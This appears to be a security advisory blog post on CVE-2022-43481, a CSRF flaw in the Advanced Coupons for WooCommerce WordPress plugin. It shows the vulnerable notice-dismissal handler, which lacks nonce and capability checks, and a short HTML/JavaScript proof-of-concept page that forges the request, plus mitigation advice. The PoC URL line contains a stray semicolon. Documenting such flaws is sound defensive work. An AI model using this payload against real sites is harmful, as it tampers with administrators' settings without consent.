CVE-2022-43481: Cross-Site Request Forgery (CSRF) Vulnerability in Advanced Coupons for WooCommerce Coupons Plugin <= 4.5 for WordPress - Notice Dismissal Exploit

A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in the Advanced Coupons for WooCommerce Coupons plugin (version <= 4.5) on WordPress. This security flaw allows an attacker to make unwarranted changes to the plugin settings leading to dismissal of notices. In this post, we will explore the details of the vulnerability, provide a code snippet to understand its implications, and link relevant references for further inspection.

Exploit Details

The Advanced Coupons for WooCommerce Coupons plugin is a popular extension that provides advanced features for managing and creating discount coupons on WooCommerce-based stores. The discovered vulnerability (CVE-2022-43481) lies in the plugin's handling of notice dismissal requests through the 'acfw_dismiss_notice' AJAX action.

Due to the absence of appropriate security checks, an attacker can exploit this by tricking an authenticated administrator into performing a CSRF attack. This potentially results in the unwanted dismissal of notices, which may cause the administrator to miss out on important alerts and updates.

The following code snippet demonstrates the vulnerability in the 'acfw_dismiss_notice' AJAX action

function acfw_dismiss_notice() {
	if ( ! empty( $_POST['notice'] ) ) {
		$notice = sanitize_text_field( $_POST['notice'] );
		update_option( 'acfw_dismissed_' . $notice, 1 );
	}
	wp_die();
}

As seen in the code above, the function 'acfw_dismiss_notice' takes input from the user through the '$_POST['notice']' variable, sanitizes the text, and then updates the option in the WordPress database accordingly. However, it lacks nonce verification and capability checks, which makes it susceptible to CSRF attacks.

Proof of Concept (PoC)

To exploit this vulnerability, an attacker could create a malicious HTML page that sends a request to the 'acfw_dismiss_notice' AJAX action when visited by an authenticated administrator. A sample PoC is shown below:

<!DOCTYPE html>
<html>
  <body>
    <h1>Malicious Page</h1>
    <script>
      function exploit() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://targetsite.com/wp-admin/admin-ajax.php";, true);
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.send("action=acfw_dismiss_notice&notice=important_notice");
      }
      exploit();
    </script>
  </body>
</html>

Mitigation

To mitigate the vulnerability, it is important to implement both nonce verification and capability checks for the 'acfw_dismiss_notice' AJAX action.

Links to original references

1. CVE Identifier: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43481
2. WordPress Plugin Repository: https://wordpress.org/plugins/advanced-coupons-for-woocommerce-free/
3. WooCommerce: https://woocommerce.com/

Conclusion

Keeping plugins up to date and ensuring the use of secure coding practices are vital steps towards maintaining the security and integrity of your WordPress website. By staying informed of vulnerabilities like CVE-2022-43481 and applying the necessary mitigations, you can better protect your website and its users.

Timeline

Published on: 11/08/2022 19:15:00 UTC
Last modified on: 11/09/2022 13:54:00 UTC